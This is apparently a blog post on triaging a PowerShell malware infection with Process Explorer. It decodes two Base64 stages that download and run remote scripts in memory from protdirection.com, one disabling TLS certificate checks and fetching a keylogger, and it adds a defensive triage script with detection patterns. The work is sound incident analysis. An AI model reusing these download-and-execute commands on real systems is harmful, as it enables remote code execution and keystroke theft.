Suspicious Activity via Powershell
I have been using Process Explorer quite a lot; it has become my replacement for Task Manager. Some day I may write about it or share a training module on it, but this post is about how Process Explorer helped me find suspicious activity via PowerShell.
One machine had been showing high CPU utilization for a few days. By the time I logged in, PowerShell was no longer consuming much CPU, but the PowerShell instances were still running.
In the tree view there were three instances of powershell.exe running under mshta.exe, the Microsoft HTML Application Host. mshta.exe is a legitimate, signed Microsoft executable, but it is frequently abused by malware to launch scripts and other programs, so a PowerShell chain hanging off it deserves a closer look.
Opening the properties of the first PowerShell process showed a command line like this:
The command shows that PowerShell reads the registry value SecCert under HKLM\Software\Microsoft\Windows\CurrentVersion. Value under SecCert
Checking the properties of the second PowerShell process, a child of the first, makes it evident that this instance is launched with the content read from that registry value as its argument.
So far it was evident that a script is running PowerShell, which in turn runs another PowerShell command whose parameter is staged in the registry. Next I checked the command line of the last PowerShell process, which looked like this:
We now have two PowerShell commands carrying Base64-encoded payloads, and both decode to HTTP download-and-execute stubs. Running them through an online Base64 decoder gave the two outputs below.
Output of 2nd PowerShell command
The decoder shows a "white box" between every character because PowerShell's -EncodedCommand expects Base64 of a UTF-16LE string, so each ASCII character is followed by a NUL byte. Removing them gives:
"while(1){try{IEX(New-Object Net.WebClient).DownloadString('http://protdirection.com/'+([char](85-(-37))))}catch{Start-Sleep -s 10}}"
The character arithmetic is a small obfuscation: [char](85-(-37)) is [char]122, the letter 'z', so the first stage loops forever fetching http://protdirection.com/z and running it in memory with IEX, sleeping 10 seconds and retrying whenever the download fails.
Now we are trying for the
After removing the NUL "white boxes" from the second output we get the command:
"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; IEX(New-Object Net.WebClient).DownloadString('https://protdirection.com/script?id=random&name=keylog')"
The first statement replaces .NET's TLS certificate validation callback with one that always returns $true, so the HTTPS download succeeds even if the server presents a self-signed, expired or otherwise untrusted certificate. The downloaded script is again executed straight from memory with IEX, so nothing is written to disk for antivirus to scan.
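The steps above (find powershell.exe under a suspicious parent, pull the encoded argument, decode it as UTF-16LE, read the staged registry value) can be scripted so the triage runs from the command line instead of clicking through Process Explorer. The following PowerShell is an added example, not code from the original post or from the malware: only the host name protdirection.com, the SecCert value name and the first decoded command are taken from the post, while the function names, the indicator list and the re-encoded demo sample are this example's own. Decoding locally also avoids pasting a live artifact into a third-party web decoder.

```powershell
# Added example: command-line triage of suspicious PowerShell processes.
# Assumptions: Windows with Get-CimInstance available; run elevated to see other users' command lines.

# -EncodedCommand takes Base64 of a UTF-16LE string. Decoding it as ASCII is what
# produced the "white boxes" (NUL bytes) in the online decoder.
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# Pull the Base64 blob that follows -e / -ec / -enc / -EncodedCommand on a command line.
# The token must start with "-" and end right before whitespace, so -ExecutionPolicy does not match.
function Get-EncodedArgument {
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '(?i)(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})') {
        return $Matches[1]
    }
    return $null
}

# Patterns seen in the two stages from the post. Names are this example's own labels.
$SuspiciousPatterns = @(
    @{ Name = 'In-memory execution of downloaded content (IEX + DownloadString)'
       Pattern = '(?is)\b(IEX|Invoke-Expression)\b.*DownloadString' }
    @{ Name = 'TLS certificate validation disabled'
       Pattern = '(?i)ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}' }
    @{ Name = 'Endless retry loop around the download'
       Pattern = '(?is)while\s*\(\s*(1|\$true)\s*\).*Start-Sleep' }
    @{ Name = 'Character arithmetic used to hide part of a URL'
       Pattern = '\[char\]\s*\(' }
    @{ Name = 'Contacts protdirection.com (host named in the post)'
       Pattern = '(?i)protdirection\.com' }
)

function Get-SuspicionIndicators {
    param([Parameter(Mandatory)][string]$Text)
    foreach ($rule in $SuspiciousPatterns) {
        if ($Text -match $rule.Pattern) { $rule.Name }
    }
}

# The first stage in the post read its payload from this registry value.
function Get-StagedRegistryPayload {
    param([string]$Path = 'HKLM:\Software\Microsoft\Windows\CurrentVersion',
          [string]$Name = 'SecCert')
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($item) { $item.$Name }
}

# Walk the live process list: every powershell.exe/pwsh.exe, its parent image,
# the decoded command (if encoded) and which indicators fired.
function Invoke-PowerShellTriage {
    $procs = Get-CimInstance Win32_Process
    $byPid = @{}
    foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }
    foreach ($p in ($procs | Where-Object { $_.Name -match '^(powershell|pwsh)\.exe$' })) {
        $parent     = $byPid[[int]$p.ParentProcessId]
        $parentName = if ($parent) { $parent.Name } else { '<exited>' }
        $b64  = Get-EncodedArgument -CommandLine ([string]$p.CommandLine)
        $body = if ($b64) { try { ConvertFrom-EncodedCommand $b64 } catch { $null } } else { $p.CommandLine }
        $indicators = @()
        if ($body) { $indicators = @(Get-SuspicionIndicators -Text $body) }
        # A scripting or Office host as the parent is worth flagging on its own, as mshta.exe was here.
        if ($parentName -match '^(mshta|wscript|cscript|winword|excel)\.exe$') {
            $indicators += "Spawned by scripting/Office host: $parentName"
        }
        [pscustomobject]@{
            Pid        = $p.ProcessId
            Parent     = "$parentName ($($p.ParentProcessId))"
            Decoded    = $body
            Indicators = $indicators
        }
    }
}

# Constructed demo input: the first decoded command from the post, re-encoded the way
# -EncodedCommand expects, so the decoder can be exercised without a live infection.
$sample    = "while(1){try{IEX(New-Object Net.WebClient).DownloadString('http://protdirection.com/'+([char](85-(-37))))}catch{Start-Sleep -s 10}}"
$sampleB64 = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($sample))
$decoded   = ConvertFrom-EncodedCommand (Get-EncodedArgument -CommandLine "powershell.exe -NoP -W Hidden -enc $sampleB64")
$decoded -eq $sample                    # True: round trip through UTF-16LE Base64
Get-SuspicionIndicators -Text $decoded  # IEX+DownloadString, retry loop, [char] arithmetic, protdirection.com

# Against the live machine:
Invoke-PowerShellTriage | Format-List
Get-StagedRegistryPayload
```

The indicator list is deliberately narrow, matching only what this post's two stages actually did, so it should be extended with whatever your environment's PowerShell logging (script block logging, event ID 4104) already flags; the decoder and parent-process walk are the reusable part.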
Conclusion:
The troubleshooting steps above lead to the conclusion that the machine is infected with malware that downloads a script from https://protdirection.com/script?id=random&name=keylog and executes it in memory. Judging by the name parameter, the script captures keystrokes and, presumably, sends them to a network location. The endless retry loop in the first stage explains the sustained CPU usage and why the PowerShell instances were still alive when I logged in.
Since we do not know the complete functionality of the downloaded script, we did not execute it on the affected host. Anyone who wants to understand exactly what it does should run it only in an isolated analysis VM while capturing Procmon and Wireshark logs during execution.
Reference:
- Base64 encoding: https://en.wikipedia.org/wiki/Base64